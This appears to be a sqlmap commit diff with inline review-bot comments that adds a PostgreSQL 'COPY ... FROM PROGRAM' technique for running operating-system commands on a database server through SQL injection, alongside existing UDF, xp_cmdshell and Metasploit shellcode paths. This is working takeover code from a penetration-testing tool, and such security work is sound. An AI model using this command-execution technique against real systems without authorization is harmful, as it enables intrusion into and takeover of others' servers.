Finalizing #3545
1 parent 5ced273 commit 2d129f3

6 files changed

Lines changed: 50 additions & 16 deletions


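--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1882,6 +1882,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.connErrorChoice = None
     kb.connErrorCounter = 0
     kb.cookieEncodeChoice = None
+    kb.copyExecTest = None
     kb.counters = {}
     kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
     kb.data = AttribDict()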

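--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.3.43"
+VERSION = "1.3.3.44"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)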

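--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -44,7 +44,10 @@ def __init__(self):
         XP_cmdshell.__init__(self)
 
     def execCmd(self, cmd, silent=False):
-        if self.webBackdoorUrl and not isStackingAvailable():
+        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
+            self.copyExecCmd(cmd)
+
+        elif self.webBackdoorUrl and not isStackingAvailable():
             self.webBackdoorRunCmd(cmd)
 
         elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
@@ -60,7 +63,10 @@ def execCmd(self, cmd, silent=False):
     def evalCmd(self, cmd, first=None, last=None):
         retVal = None
 
-        if self.webBackdoorUrl and not isStackingAvailable():
+        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
+            retVal = self.copyExecCmd(cmd)
+
+        elif self.webBackdoorUrl and not isStackingAvailable():
             retVal = self.webBackdoorRunCmd(cmd)
 
         elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
@@ -103,14 +109,19 @@ def shell(self):
             logger.info(infoMsg)
 
         else:
-            if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
-                infoMsg = "going to use injected sys_eval and sys_exec "
-                infoMsg += "user-defined functions for operating system "
+            if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
+                infoMsg = "going to use 'COPY ... FROM PROGRAM ...' "
+                infoMsg += "command execution"
+                logger.info(infoMsg)
+
+            elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+                infoMsg = "going to use injected user-defined functions "
+                infoMsg += "'sys_eval' and 'sys_exec' for operating system "
                 infoMsg += "command execution"
                 logger.info(infoMsg)
 
             elif Backend.isDbms(DBMS.MSSQL):
-                infoMsg = "going to use xp_cmdshell extended procedure for "
+                infoMsg = "going to use extended procedure 'xp_cmdshell' for "
                 infoMsg += "operating system command execution"
                 logger.info(infoMsg)
 
@@ -200,7 +211,9 @@ def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
 
             logger.warn(warnMsg)
 
-        if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+        if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
+            success = True
+        elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
             success = self.udfInjectSys()
 
         if success is not True: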
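Review bot: The new COPY-based gate is applied inconsistently within this file: initEnv (new line 214) only takes that path when `any((conf.osCmd, conf.osShell))` holds, whereas execCmd, evalCmd and shell call `self.checkCopyExec()` on any PostgreSQL back-end. Because checkCopyExec runs a probe on its first call and caches the answer, an execCmd issued in a mode where initEnv deliberately chose `udfInjectSys()` will still trigger the probe and may silently switch execution strategy after the UDFs have already been injected. Factor the condition into one method and use it at all four sites, e.g. `def _useCopyExec(self): return any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec()`, so the choice is made the same way everywhere. checkCopyExec exists only on the PostgreSQL plugin, so the `Backend.isDbms(DBMS.PGSQL)` short-circuit is what protects the other back-ends from an AttributeError; that deserves a one-line comment at the first call site. execCmd, evalCmd, shell and initEnv all continue outside their hunks.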

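--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -10,6 +10,8 @@
 from lib.core.common import Backend
 from lib.core.common import checkFile
 from lib.core.common import decloakToTemp
+from lib.core.common import isListLike
+from lib.core.common import isStackingAvailable
 from lib.core.common import randomStr
 from lib.core.data import kb
 from lib.core.data import logger
@@ -104,13 +106,28 @@ def uncPathRequest(self):
         self.cleanup(onlyFileTbl=True)
 
     def copyExecCmd(self, cmd):
-        # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
-        self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
-        self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
-        self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
-        inject.goStacked(self._forgedCmd)
+        output = None
 
-        query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
-        output = inject.getValue(query, resumeValue=False)
+        if isStackingAvailable():
+            # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+            self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
+            self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
+            self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
+            inject.goStacked(self._forgedCmd)
+
+            query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
+            output = inject.getValue(query, resumeValue=False)
+
+            if isListLike(output):
+                output = os.linesep.join(output)
+
+            self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
+            inject.goStacked(self._cleanupCmd)
 
         return output
+
+    def checkCopyExec(self):
+        if kb.copyExecTest is None:
+            kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
+
+        return kb.copyExecTest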
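Review bot: checkCopyExec (new line 129) reads like a pure predicate, but its first call executes a command on the back-end through copyExecCmd, creates and drops `self.cmdTblName`, and then caches the verdict in `kb.copyExecTest` for every later caller in lib/takeover/abstraction.py and plugins/generic/misc.py; none of that is stated at the definition. Add a docstring along the lines of `"""Probe once whether stacked 'COPY ... FROM PROGRAM' works; runs a command on the target on first call and caches the result in kb.copyExecTest."""`. On line 122, `os.linesep.join(output)` presumes `os` is imported at the top of this module (not visible in the hunk) and that every element returned by `inject.getValue` is a string — if a row can be None the join raises TypeError; a `# assumes getValue rows are str` comment or a `str()` map would make the expectation explicit. uncPathRequest and the rest of the class lie outside the hunk.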

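--- a/plugins/generic/misc.py
+++ b/plugins/generic/misc.py
@@ -140,6 +140,9 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):
         if not isStackingAvailable() and not conf.direct:
             return
 
+        if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest:
+            return
+
         if Backend.isOs(OS.WINDOWS):
             libtype = "dynamic-link library"
 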

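--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -169,7 +169,7 @@ def osPwn(self):
         msg = "how do you want to execute the Metasploit shellcode "
         msg += "on the back-end database underlying operating system?"
         msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
-        msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
+        msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
 
         while True:
             choice = readInput(msg, default='1')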
